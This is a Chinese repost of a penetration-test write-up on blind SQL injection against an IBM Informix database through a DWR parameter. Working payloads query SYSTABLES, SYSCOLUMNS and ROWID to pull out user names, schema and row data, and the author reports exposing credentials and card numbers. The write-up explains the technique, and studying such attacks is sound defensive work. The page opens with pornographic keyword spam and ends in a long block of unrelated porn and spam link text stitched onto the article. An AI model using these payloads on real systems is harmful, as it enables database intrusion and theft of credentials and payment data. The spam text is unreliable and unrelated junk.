精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Informix數據庫SQL注入實戰

安全 數據安全
在最近的應用程序滲透測試中,我發現一個有意思的sql漏洞(SQLI中)。本文,筆者來介紹他遇到的問題以及如何解決并dump數據庫。

在最近的應用程序滲透測試中,我發現一個有意思的sql漏洞(SQLI中)。

SQLI出現這種情況的原因:

1.開發中帶來的問題

2.數據庫正在使用

下面,我來介紹我遇到的問題以及如何解決并dump數據庫。該應用程序使用一種名為DWR后端的JAVA遠程調用框架,系統調用是這樣的:

Informix數據庫SQL注入實戰

這是位于C0-param1的參數,從表面上看起來很容易,因為它給了詳細的錯誤信息,當一個單引號被添加到參數尾部時,會得到以下錯誤信息:“java.sql.SQLException: A syntax error has occurred.”(語法錯誤)

Informix數據庫SQL注入實戰

c0-param1參數控制有多少結果從數據庫中檢索出來,這注射點出現在類似于mssql的TOP keyword位置和MYSQL的Limit。我認為SQLI跑MSSQL庫比MYSQL更合適。我添加一系列請求如下圖所示:

Informix數據庫SQL注入實戰

執行查詢后,得到一個錯誤信息:“java.sql.SQLException: The column (card_no) must be in the GROUP BY list.”數據庫系統是IBM的Informix,我對Informix了解甚少,所以還得一個函數一個函數地查IBM的文檔。

現在知道這是Informix,能幫助我們對次注射是怎么產生的,第一個子句,類似TOP和LIMIT,查詢起來是這樣的:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID = 1), 1, 1) = 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

如果條件為真(即當前用戶名的第一個字母為'a'),查詢將返回結果,反則會報錯,因為子查詢(SELECT 1 FROM SYSTABLES)會返回多個結果。然而,又有難題了,不能使用等號,通過替換,使用以下語句:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

有了這些注射知識和概念就好整多了,掏出sqlmap(從我的同事那里弄到了些小技巧,而且觀摩了他的帖子“Sqlmap的高級注入技巧”),Sqlmap的確是很好的工具,作者是今年在大會上認識的一個很不錯的家伙寫的。。。好像跑題了。不過遺憾的是,Sqlmap不支持Informix,所以我不得不自己寫工具了:

獲取表名的長度:

c0-param1=string:10 (CASE WHEN CHAR_LENGTH((SELECT TABNAME FROM SYSTABLES WHERE TABID > 0 AND TABID < 2)) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

獲取表名:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT TABNAME FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

獲取有表中有多少列:

c0-param1=string:10 (CASE WHEN (SELECT NCOLS FROM SYSTABLES WHERE TABID > 0 AND TABID < 2) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

獲取列名長度:

c0-param1=string:10 (CASE WHEN CHAR_LENGTH((SELECT COLNAME FROM SYSCOLUMNS WHERE (TABID > 0 AND TABID < 2) AND (COLNO > 0 AND COLNO < 2))) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

獲取列名:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT COLNAME FROM SYSCOLUMNS WHERE (TABID > 0 AND TABID < 2) AND (COLNO > 0 AND COLNO < 2)), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

通過一個小研究,我發現Informix的表實際上有一個隱藏很深的列名:ROWID,每一行都存在一個這樣的序列號。然而,這些ROWID可以分散,刪除或插入到表。為了找到包含數據的ROWID,我調用一個名為NVL的函數,這個函數可以返回不同的結果,具體取決于第一個參數是否為NULL。最終找到一處可能總是包含數據的一列,語句:

c0-param1=string:10 (NVL((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 2), (SELECT 1 FROM SYSTABLES))),

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 1), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

通過這種方法,能夠發現純文本應用程序憑據,明文銀行SFTP憑證和未加密的支付卡號碼。

隨著這一成功,明白了以前對Informix數據庫想知道的。

原文地址:http://blog.spiderlabs.com/2013/12/the-case-of-an-obscure-injection.html

責任編輯:藍雨淚 來源: FreebuF
相關推薦

2013-07-25 20:36:02

2009-01-07 09:46:18

InformixOnline數據庫

2010-04-12 08:59:00

2022-11-04 08:34:27

Oracle數據庫

2010-09-09 14:31:31

SQL函數數據庫

2017-05-18 12:45:57

Informix-On備份數據庫

2013-04-26 11:39:40

2010-09-30 09:11:01

2009-03-09 09:26:49

Informix數據庫管理OLTP

2011-03-04 10:30:25

ASP數據庫

2015-09-15 16:29:25

2009-10-09 15:20:12

2011-03-25 09:46:16

Informix數據庫安全性安全審計

2010-07-15 17:28:50

SQL Server

2010-06-30 08:46:51

升級SQL Serve

2022-12-07 18:45:22

內存數據庫Redis

2021-05-17 06:57:34

SQLServer數據庫

2012-12-10 10:57:04

IBMdW

2018-02-10 09:44:19

2010-07-30 09:49:05

點贊
收藏

51CTO技術棧公眾號

亚洲欧洲日韩在线| 亚洲特级毛片| 欧美男生操女生| 日韩精品一区二区免费| 欧美在线观看在线观看| 久久99日本精品| 亚洲97在线观看| 日本黄色录像视频| silk一区二区三区精品视频| 欧美日韩加勒比精品一区| 亚洲 日韩 国产第一区| www.久久色| 日日夜夜免费精品视频| 欧美极品少妇xxxxx| 五月天精品在线| 白白在线精品| 欧美精品在线观看一区二区| 青青青在线视频播放| av影片免费在线观看| 盗摄精品av一区二区三区| 国产精品aaaa| 亚洲成人生活片| 精品国产美女| 亚洲丁香婷深爱综合| 男人添女人下面免费视频| 国产第一页在线| 中文字幕在线一区免费| 欧洲一区二区日韩在线视频观看免费| www三级免费| 麻豆成人综合网| 国产精品成人国产乱一区| 国产一卡二卡在线播放| 91成人国产| 日韩中文字幕网站| 亚洲一级片在线播放| 台湾佬综合网| 亚洲精品国产suv| 久久久久亚洲AV成人网人人小说| 在线观看欧美| 欧美日韩在线播放三区| 无人在线观看的免费高清视频| gogo久久| 亚洲电影第三页| 日本久久久网站| 肉体视频在线| 亚洲精选一二三| 操bbb操bbb| a级毛片免费观看在线| 亚洲欧美影音先锋| 在线观看欧美激情| 日本中文字幕在线看| 国产视频在线观看一区二区三区 | 一区二区成人av| 性欧美精品中出| 伊人久久大香线蕉无限次| 亚洲国内精品在线| 菠萝菠萝蜜网站| 亚洲成在人线免费观看| 亚洲石原莉奈一区二区在线观看| 91久久免费视频| 精品理论电影在线| 啊v视频在线一区二区三区| 91麻豆精品成人一区二区| 亚洲色图国产| 久久久亚洲精品视频| 日韩伦理在线视频| 视频一区视频二区中文字幕| 国产精品99一区| 国产一区二区三区成人| 国产精品中文有码| 国产视频一区二区三区四区| 色综合成人av| 亚洲国产高清在线观看视频| 综合色婷婷一区二区亚洲欧美国产| 久草中文在线| 亚洲一区免费在线观看| 37pao成人国产永久免费视频| 影视一区二区三区| 在线播放欧美女士性生活| 熟妇女人妻丰满少妇中文字幕 | 欧美国产视频在线观看| 成人高清免费在线播放| 亚洲卡通动漫在线| 99999精品视频| 国产欧美在线观看免费| 欧美tickling挠脚心丨vk| 亚洲av无码一区二区二三区| 久久国产小视频| 国产做受高潮69| 欧美三级网站在线观看| 国产成人在线视频网站| 免费在线观看91| 老司机免费在线视频| 午夜久久久影院| 日韩精品视频一二三| youjizzjizz亚洲| 中文字幕免费精品一区高清| 精品少妇久久久| 日韩和欧美一区二区| 成人女人免费毛片| 香蕉视频在线看| 欧美日韩在线视频一区| 永久av免费在线观看| 夜夜春成人影院| 欧美高清一级大片| 亚洲天堂视频网| 久久色中文字幕| 成人av在线不卡| 福利精品在线| 亚洲欧美日韩网| 精品无码av在线| 精品无码三级在线观看视频| 狼狼综合久久久久综合网| av在线免费网址| 在线观看视频一区二区欧美日韩| 中文字幕在线视频播放| 先锋资源久久| 国产精品久久久久影院日本| 日本激情视频网站| 亚洲综合免费观看高清完整版在线| 簧片在线免费看| 少妇久久久久| 久久久亚洲网站| 亚洲精品国偷拍自产在线观看蜜桃| 国产精品人妖ts系列视频| 国产午夜福利100集发布| 日韩免费成人| 久久天天躁狠狠躁夜夜爽蜜月| 亚洲av无码不卡| 91理论电影在线观看| 亚洲熟妇av日韩熟妇在线| 视频欧美一区| 欧美精品在线免费| 国产精品无码免费播放| 国产精品久久毛片a| 粗暴91大变态调教| 欧美激情在线精品一区二区三区| 午夜欧美不卡精品aaaaa| 99久久久国产精品无码网爆| 国产精品大尺度| 欧美美女性视频| 成人av二区| 国产免费一区视频观看免费| 成人免费在线电影| 欧美亚洲一区二区在线观看| 亚洲色成人网站www永久四虎| 免费亚洲一区| 热舞福利精品大尺度视频| 欧美性xxx| 国产亚洲精品美女久久久| 高清乱码免费看污| 国产三级欧美三级日产三级99 | 欧美aa视频| 亚洲欧洲国产精品| 成人黄色片在线观看| 国产精品美女久久久久aⅴ国产馆 国产精品美女久久久久av爽李琼 国产精品美女久久久久高潮 | 国产亚洲一级高清| 波多野结衣黄色| 中文字幕在线不卡| 四虎国产精品免费| 99re国产精品| 欧美精品123| 97人人做人人爽香蕉精品| 中文字幕在线看视频国产欧美在线看完整| 亚洲精品一区二三区| 国产精品久久久久久久久免费相片 | а√天堂8资源在线| 精品偷拍各种wc美女嘘嘘| 欧美日韩乱国产| 中文字幕免费不卡在线| 在线免费看污网站| 日韩午夜免费| 欧美日韩精品一区| 韩国精品视频在线观看| 欧美人交a欧美精品| 人人妻人人澡人人爽人人欧美一区| 婷婷国产在线综合| 欧美成人久久久免费播放| 国产自产高清不卡| 久艹视频在线免费观看| 国产在线日韩精品| 成人午夜小视频| 两个人看的在线视频www| 在线性视频日韩欧美| 午夜老司机福利| 欧美亚洲综合网| 久久国产在线视频| 国产亚洲精品资源在线26u| 91视频福利网| 久久精品道一区二区三区| 在线观看精品视频| 曰本一区二区三区视频| 成人网在线免费观看| 涩涩视频在线免费看| www亚洲精品| 亚洲av片一区二区三区| 91精品久久久久久蜜臀| 欧美一区免费看| 一区二区三区四区高清精品免费观看 | 污污污污污污www网站免费| 精品一区三区| 国产精品区免费视频| 国产亚洲欧美日韩精品一区二区三区 | 成av人片在线观看www| 日韩最新av在线| 日韩欧美在线番号| 日韩精品专区在线影院观看| 波多野结衣在线观看视频| 亚洲成人免费影院| 国产男女猛烈无遮挡在线喷水| 91社区在线播放| 911亚洲精选| 久久99久久99小草精品免视看| 国产乱子伦农村叉叉叉| 最新国产精品久久久| 色涩成人影视在线播放| 色老板在线视频一区二区| 99视频日韩| 国产精品va视频| 国产精品欧美激情在线播放| 中文字幕影音在线| 97视频在线观看视频免费视频| www视频在线看| 日韩网站免费观看| jizz亚洲| 一区二区三区在线播放欧美| 欧美视频综合| 日韩麻豆第一页| 日日夜夜精品免费| 欧美mv日韩mv| 亚洲精品一区二区口爆| 日韩一卡二卡三卡四卡| 国产视频一区二区三| 在线观看91精品国产麻豆| 中文字幕你懂的| 91福利在线播放| 91在线视频免费播放| 欧美日韩在线视频首页| 日韩黄色在线播放| 精品电影在线观看| 可以在线观看av的网站| 欧美日韩免费在线| 天天操夜夜操视频| 色综合天天天天做夜夜夜夜做| 九九九在线观看| 色综合夜色一区| 国产一级片免费在线观看| 色婷婷一区二区| 91麻豆精品在线| 欧美军同video69gay| 国产剧情久久久| 日韩片之四级片| 国模人体一区二区| 日韩精品亚洲元码| 能在线看的av| 最新亚洲国产精品| 在线免费观看a视频| 欧美日韩成人网| 国产白浆在线免费观看| 欧美一区二区三区艳史| 成人看片网页| 91精品视频免费观看| 综合中文字幕| 久久久影院一区二区三区| 国内精品久久久久久久影视简单 | 欧美视频久久| 男人用嘴添女人下身免费视频| 一区二区三区国产在线| 亚洲免费av一区二区三区| 久久国产人妖系列| 国产乱淫av麻豆国产免费| 成人激情免费网站| 色哟哟精品观看| 最好看的中文字幕久久| 久草视频手机在线观看| 欧美性猛交xxxx乱大交蜜桃| 伊人网综合在线| 欧美不卡123| 免费a级毛片在线观看| 日韩在线一区二区三区免费视频| 丝袜综合欧美| 日韩av免费一区| 高清精品久久| 欧美精品一区二区视频| 97视频精品| 国产又黄又大又粗视频| 久久精品二区亚洲w码| 怡红院一区二区| 亚洲国产精品精华液ab| 国产精品9191| 欧美人动与zoxxxx乱| 秋霞欧美在线观看| 最近2019年好看中文字幕视频 | 国产大学生视频| 国产精品色一区二区三区| 久久中文字幕无码| 欧美无人高清视频在线观看| 欧美 日韩 国产 在线| 中文字幕无线精品亚洲乱码一区 | 99高清视频有精品视频| 色综合综合网| 欧美国产综合在线| 麻豆成人久久精品二区三区红| 久久久午夜精品福利内容| 中文天堂在线一区| 久久亚洲精品国产| 日韩精品资源二区在线| 五月婷婷在线观看| 欧洲亚洲免费视频| 一区中文字幕| 久久久一二三四| 日本特黄久久久高潮| 波多野结衣影院| 亚洲精品国产成人久久av盗摄| 欧美 亚洲 另类 激情 另类| 精品中文视频在线| 啊啊啊久久久| av成人午夜| 欧美福利网址| 激情图片中文字幕| 中文字幕高清一区| 无码任你躁久久久久久久| 亚洲激情自拍图| 美女精品视频| 114国产精品久久免费观看| 水蜜桃久久夜色精品一区| 大肉大捧一进一出好爽动态图| 波多野结衣亚洲一区| 精品无码m3u8在线观看| 日韩欧美成人激情| 综合久久2019| 99久热re在线精品996热视频| 亚洲一区二区三区| 午夜激情影院在线观看| 亚洲色图在线看| 一级黄色a视频| www.日韩系列| 精品国产一级| 青青青在线观看视频| 高清不卡一二三区| 国产在线观看99| 亚洲高清久久久久久| 精品捆绑调教一区二区三区| 精品国产电影| 久久九九电影| 538精品视频| 欧美日韩国产另类不卡| 麻豆av免费在线观看| 91精品视频在线播放| 欧美福利在线| 欧美极品jizzhd欧美仙踪林| 亚洲超碰精品一区二区| 亚洲区小说区图片区| 国产成人精品久久亚洲高清不卡| 中文字幕亚洲影视| 欧美丰满熟妇xxxxx| 日本一区二区不卡视频| 国产又大又长又粗| 色综合久久久久久中文网| 高清精品视频| 久久国产乱子伦免费精品| 国产亚洲污的网站| 国产裸体永久免费无遮挡| 欧美精品videos| 欧美美乳视频| www欧美激情| 亚洲精品日韩综合观看成人91| 精品人妻无码一区二区| 97欧美精品一区二区三区| 伊人成综合网伊人222| 国内外成人免费在线视频| 一区二区三区不卡视频在线观看| 刘亦菲毛片一区二区三区| 热re91久久精品国99热蜜臀| 成人高清av| 蜜臀av粉嫩av懂色av| 欧美午夜在线一二页| 国精一区二区三区| 青青草成人网| 国产麻豆午夜三级精品| 日韩毛片在线视频| 日韩视频在线免费观看| 久久97精品| 三上悠亚在线一区| 亚洲成人中文在线| 在线观看h片| 国产精品播放| 蜜桃精品视频在线| 久久机热这里只有精品| 亚洲视频自拍偷拍| 视频一区中文字幕精品| www.xxx亚洲| 亚洲国产中文字幕在线视频综合| 成人亚洲性情网站www在线观看| 97在线电影| 蜜臀av一区二区三区| 国产福利拍拍拍| 伦理中文字幕亚洲| 精品一区三区| 黄色av网址在线观看|